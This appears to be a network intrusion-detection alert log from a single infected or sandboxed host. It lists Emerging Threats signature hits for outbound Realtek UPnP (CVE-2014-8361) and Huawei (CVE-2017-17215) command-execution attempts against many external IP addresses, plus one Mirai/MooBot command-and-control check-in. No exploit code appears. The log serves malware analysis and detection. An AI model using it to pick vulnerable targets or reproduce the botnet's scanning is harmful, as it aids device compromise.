                                                07/20/24-23:06:46.064783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5413652869192.168.2.1488.238.72.249
                                                07/20/24-23:06:11.425707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23483652869192.168.2.1435.248.92.7
                                                07/20/24-23:05:58.374852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4282052869192.168.2.14169.254.99.226
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622837215192.168.2.14157.68.215.138
                                                07/20/24-23:05:37.449942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6087252869192.168.2.14153.91.158.250
                                                07/20/24-23:05:58.094268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4702252869192.168.2.14101.212.53.40
                                                07/20/24-23:06:35.309569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26075652869192.168.2.1414.217.3.16
                                                07/20/24-23:06:12.623995TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615332052869192.168.2.14132.235.217.106
                                                07/20/24-23:06:02.392607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615342252869192.168.2.14187.171.57.128
                                                07/20/24-23:05:37.440953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4687252869192.168.2.14210.29.223.179
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335837215192.168.2.14157.183.60.43
                                                07/20/24-23:05:58.592016TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25616852869192.168.2.14169.22.244.181
                                                07/20/24-23:06:02.251198TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4001252869192.168.2.14182.199.230.99
                                                07/20/24-23:05:35.925407TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614440252869192.168.2.14157.63.164.204
                                                07/20/24-23:06:02.429547TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5343452869192.168.2.14187.171.57.128
                                                07/20/24-23:06:16.347950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25584652869192.168.2.14116.229.240.238
                                                07/20/24-23:05:59.333908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615311452869192.168.2.14199.125.41.58
                                                07/20/24-23:05:52.697720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23709052869192.168.2.14179.206.85.237
                                                07/20/24-23:05:58.995248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3820052869192.168.2.14126.169.68.235
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642837215192.168.2.1441.70.140.218
                                                07/20/24-23:06:43.392497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064652869192.168.2.1462.176.218.93
                                                07/20/24-23:05:33.861088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619037215192.168.2.14157.221.39.140
                                                07/20/24-23:05:37.540433TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5780052869192.168.2.14143.50.74.208
                                                07/20/24-23:05:52.607039TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24870252869192.168.2.14213.18.175.220
                                                07/20/24-23:06:00.558004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615827452869192.168.2.14103.161.142.105
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898437215192.168.2.14197.232.120.82
                                                07/20/24-23:05:40.467316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3993052869192.168.2.14153.214.17.177
                                                07/20/24-23:05:42.220682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698837215192.168.2.14157.42.83.151
                                                07/20/24-23:06:01.260147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25086452869192.168.2.1472.135.129.227
                                                07/20/24-23:06:00.247273TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4238452869192.168.2.14133.192.223.98
                                                07/20/24-23:05:52.531304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207252869192.168.2.1464.214.151.9
                                                07/20/24-23:05:46.512016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3950852869192.168.2.14189.78.230.222
                                                07/20/24-23:05:50.522257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874837215192.168.2.14157.42.248.251
                                                07/20/24-23:06:00.954678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4752652869192.168.2.14112.235.16.243
                                                07/20/24-23:06:08.640698TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4852052869192.168.2.14150.243.199.82
                                                07/20/24-23:06:01.143971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085252869192.168.2.14218.31.236.194
                                                07/20/24-23:06:02.091054TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23871052869192.168.2.1464.226.150.186
                                                07/20/24-23:05:50.513568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.14157.138.150.158
                                                07/20/24-23:05:42.245949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941837215192.168.2.141.128.210.11
                                                07/20/24-23:06:15.435068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3412052869192.168.2.14115.150.215.241
                                                07/20/24-23:05:37.527690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4360652869192.168.2.141.23.28.195
                                                07/20/24-23:05:40.344189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25843652869192.168.2.1445.124.106.123
                                                07/20/24-23:05:56.310476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107637215192.168.2.1441.183.88.177
                                                07/20/24-23:06:00.143129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5436052869192.168.2.14109.93.236.93
                                                07/20/24-23:06:01.452056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24568852869192.168.2.14123.159.227.193
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115637215192.168.2.14197.160.76.246
                                                07/20/24-23:05:47.280490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614184052869192.168.2.14143.164.138.163
                                                07/20/24-23:05:48.183114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3864052869192.168.2.1498.121.52.186
                                                07/20/24-23:06:01.961036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6043052869192.168.2.1482.59.244.30
                                                07/20/24-23:05:59.290948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3563252869192.168.2.14184.183.98.168
                                                07/20/24-23:05:46.056805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3355252869192.168.2.1432.146.109.53
                                                07/20/24-23:06:00.114628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3397252869192.168.2.14147.246.160.90
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574837215192.168.2.1441.149.239.1
                                                07/20/24-23:05:32.045227TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)375502466192.168.2.1415.235.203.214
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685037215192.168.2.14157.22.107.208
                                                07/20/24-23:06:38.097414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219437215192.168.2.14157.56.26.35
                                                07/20/24-23:07:06.283235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615864652869192.168.2.14117.166.204.176
                                                07/20/24-23:05:57.200464TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615464652869192.168.2.14140.182.198.151
                                                07/20/24-23:05:40.260797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615587852869192.168.2.141.57.80.92
                                                07/20/24-23:05:40.339812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498052869192.168.2.14206.209.134.255
                                                07/20/24-23:05:57.171385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3464852869192.168.2.1489.30.212.13
                                                07/20/24-23:05:45.753312TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614013652869192.168.2.14179.214.191.139
                                                07/20/24-23:05:56.430184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702237215192.168.2.14157.155.102.231
                                                07/20/24-23:05:40.486123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25996452869192.168.2.1432.251.164.213
                                                07/20/24-23:05:40.344189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25053052869192.168.2.1491.121.169.191
                                                07/20/24-23:05:42.256029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215237215192.168.2.1441.164.28.249
                                                07/20/24-23:05:57.797060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011852869192.168.2.14147.107.44.253
                                                07/20/24-23:05:58.087911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4091452869192.168.2.14136.239.147.161
                                                07/20/24-23:05:39.055908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282237215192.168.2.1434.67.137.40
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513237215192.168.2.1441.12.186.59
                                                07/20/24-23:05:50.537576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069037215192.168.2.14197.10.203.24
                                                07/20/24-23:05:50.595920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407037215192.168.2.14189.255.135.112
                                                07/20/24-23:06:06.186329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3318652869192.168.2.1441.158.158.125
                                                07/20/24-23:06:00.177522TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26023052869192.168.2.14223.141.195.26
                                                07/20/24-23:06:01.260147TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615694252869192.168.2.14188.99.16.192
                                                07/20/24-23:06:11.426541TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615954452869192.168.2.14117.16.193.167
                                                07/20/24-23:06:09.610263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4202252869192.168.2.14201.181.217.132
                                                07/20/24-23:05:35.732603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615635852869192.168.2.14143.50.74.208
                                                07/20/24-23:05:35.264109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4901252869192.168.2.14101.86.111.6
                                                07/20/24-23:06:15.338809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3285852869192.168.2.14209.246.221.148
                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883237215192.168.2.1441.184.132.220
                                                07/20/24-23:05:45.468009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369437215192.168.2.14201.239.149.144
                                                07/20/24-23:07:08.228937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4409452869192.168.2.1451.66.202.30
                                                07/20/24-23:06:12.532321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814852869192.168.2.1487.122.32.138
                                                07/20/24-23:06:31.001861TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613422452869192.168.2.1471.4.254.9
                                                07/20/24-23:05:35.361374TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4323252869192.168.2.1436.164.151.170
                                                07/20/24-23:06:12.244446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4708652869192.168.2.142.174.24.244
                                                07/20/24-23:05:50.557201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978837215192.168.2.14194.37.211.160
                                                07/20/24-23:07:06.736138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614172252869192.168.2.14172.186.38.12
                                                07/20/24-23:05:37.997517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615631452869192.168.2.1447.104.234.54
                                                07/20/24-23:05:36.328640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716037215192.168.2.14157.69.182.132
                                                07/20/24-23:05:38.418921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5628252869192.168.2.14141.250.254.239
                                                07/20/24-23:05:52.531088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4293852869192.168.2.14179.97.101.3
                                                07/20/24-23:06:01.170266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6092852869192.168.2.14130.216.114.2
                                                07/20/24-23:05:35.867960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453452869192.168.2.14158.68.165.132
                                                07/20/24-23:05:39.677506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182437215192.168.2.14157.204.36.35
                                                07/20/24-23:06:24.267901TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4071652869192.168.2.14191.139.246.160
                                                07/20/24-23:06:02.943061TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4722452869192.168.2.14156.142.205.241
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154037215192.168.2.14157.183.80.133
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920837215192.168.2.1441.22.194.170
                                                07/20/24-23:05:50.559359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443237215192.168.2.1441.2.144.140
                                                07/20/24-23:05:35.793562TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615424852869192.168.2.14103.77.206.92
                                                07/20/24-23:05:56.998513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615558452869192.168.2.1465.123.169.88
                                                07/20/24-23:06:01.170267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4353052869192.168.2.1419.25.67.71
                                                07/20/24-23:05:40.325934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23469452869192.168.2.14126.238.252.160
                                                07/20/24-23:05:59.106017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019852869192.168.2.14130.191.45.135
                                                07/20/24-23:05:59.118554TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5839852869192.168.2.14184.148.136.22
                                                07/20/24-23:06:17.076848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5953052869192.168.2.14176.50.156.26
                                                07/20/24-23:05:56.994181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4996852869192.168.2.1469.166.16.198
                                                07/20/24-23:05:52.516035TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25618052869192.168.2.14103.131.184.129
                                                07/20/24-23:06:05.309801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3645052869192.168.2.1412.220.195.141
                                                07/20/24-23:06:02.017303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5568452869192.168.2.1445.62.223.206
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.14141.199.59.173
                                                07/20/24-23:05:33.863090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559637215192.168.2.14157.248.11.159
                                                07/20/24-23:06:01.399812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569452869192.168.2.1420.239.242.93
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5356652869192.168.2.14216.254.35.160
                                                07/20/24-23:05:52.514709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5547452869192.168.2.1460.4.213.153
                                                07/20/24-23:05:38.951134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084837215192.168.2.14157.186.3.226
                                                07/20/24-23:05:52.488878TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25701052869192.168.2.14208.86.138.213
                                                07/20/24-23:05:40.365973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3457852869192.168.2.14172.234.119.46
                                                07/20/24-23:06:17.447614TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614230652869192.168.2.14150.31.127.80
                                                07/20/24-23:05:40.361541TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24571452869192.168.2.1412.129.231.129
                                                07/20/24-23:05:57.134757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712652869192.168.2.14108.121.255.112
                                                07/20/24-23:05:59.426493TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24661652869192.168.2.1466.234.95.91
                                                07/20/24-23:05:45.435097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135437215192.168.2.14157.74.46.113
                                                07/20/24-23:05:59.236975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5734852869192.168.2.14144.12.181.130
                                                07/20/24-23:06:11.477052TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614105852869192.168.2.1480.199.29.190
                                                07/20/24-23:06:14.686896TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4643452869192.168.2.14190.92.200.248
                                                07/20/24-23:05:52.493434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25321252869192.168.2.1491.116.209.39
                                                07/20/24-23:05:57.180627TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614850652869192.168.2.14140.124.136.34
                                                07/20/24-23:06:01.625834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3634452869192.168.2.1477.92.149.55
                                                07/20/24-23:05:56.036527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226437215192.168.2.14157.46.102.30
                                                07/20/24-23:05:59.045965TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24375452869192.168.2.14187.252.112.173
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205037215192.168.2.14157.62.62.113
                                                07/20/24-23:05:38.717242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383652869192.168.2.14118.253.173.37
                                                07/20/24-23:05:59.303078TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25577652869192.168.2.14167.41.255.218
                                                07/20/24-23:05:39.092497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4237052869192.168.2.14115.51.161.31
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621037215192.168.2.1441.95.137.213
                                                07/20/24-23:05:48.763323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285037215192.168.2.14197.119.79.35
                                                07/20/24-23:06:16.051223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154437215192.168.2.1441.234.183.206
                                                07/20/24-23:05:59.404275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4505052869192.168.2.14138.215.99.180
                                                07/20/24-23:06:26.081693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4661052869192.168.2.1444.44.140.237
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339037215192.168.2.14157.226.247.93
                                                07/20/24-23:05:52.475330TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25336252869192.168.2.14109.136.114.158
                                                07/20/24-23:06:25.632747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4066052869192.168.2.14177.192.100.150
                                                07/20/24-23:05:37.468948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5720652869192.168.2.14113.47.213.157
                                                07/20/24-23:05:36.079491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4328452869192.168.2.14223.210.25.241
                                                07/20/24-23:05:46.749345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613492052869192.168.2.14125.155.98.40
                                                07/20/24-23:05:38.229203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5214452869192.168.2.14131.183.255.118
                                                07/20/24-23:06:01.850879TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25461652869192.168.2.1473.137.146.119
                                                07/20/24-23:07:06.633526TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615283852869192.168.2.14211.22.232.253
                                                07/20/24-23:05:39.795410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5037652869192.168.2.1479.209.117.180
                                                07/20/24-23:05:58.084343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3925252869192.168.2.14182.199.230.99
                                                07/20/24-23:05:56.119462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511037215192.168.2.14138.38.14.252
                                                07/20/24-23:05:42.143657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888037215192.168.2.14197.196.210.118
                                                07/20/24-23:05:58.162298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4403052869192.168.2.1483.147.48.75
                                                07/20/24-23:05:58.178719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3379652869192.168.2.14102.91.220.41
                                                07/20/24-23:06:03.235312TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615912852869192.168.2.14148.2.55.117
                                                07/20/24-23:06:48.772924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24946852869192.168.2.14198.211.177.39
                                                07/20/24-23:05:37.540434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23316452869192.168.2.14132.39.168.140
                                                07/20/24-23:05:52.603344TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25221052869192.168.2.14207.158.17.11
                                                07/20/24-23:06:18.458632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4822852869192.168.2.14168.176.14.101
                                                07/20/24-23:05:33.857159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195837215192.168.2.14211.147.140.76
                                                07/20/24-23:05:47.286733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614751852869192.168.2.14223.116.88.128
                                                07/20/24-23:05:33.861088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482237215192.168.2.14157.180.0.116
                                                07/20/24-23:05:57.560235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337652869192.168.2.14191.56.232.70
                                                07/20/24-23:06:10.529848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613447052869192.168.2.1435.248.92.7
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351637215192.168.2.14197.227.66.253
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391437215192.168.2.14197.103.230.8
                                                07/20/24-23:06:05.676725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23724252869192.168.2.1477.92.149.55
                                                07/20/24-23:05:34.660344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952437215192.168.2.14157.252.199.36
                                                07/20/24-23:06:11.328788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615824052869192.168.2.1442.74.229.86
                                                07/20/24-23:05:44.688793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5154052869192.168.2.14185.227.212.222
                                                07/20/24-23:06:05.032317TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613447052869192.168.2.145.28.25.19
                                                07/20/24-23:07:08.490661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4092852869192.168.2.14155.40.210.136
                                                07/20/24-23:06:16.084912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24319052869192.168.2.14145.163.35.151
                                                07/20/24-23:05:52.594252TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25387052869192.168.2.1480.197.100.180
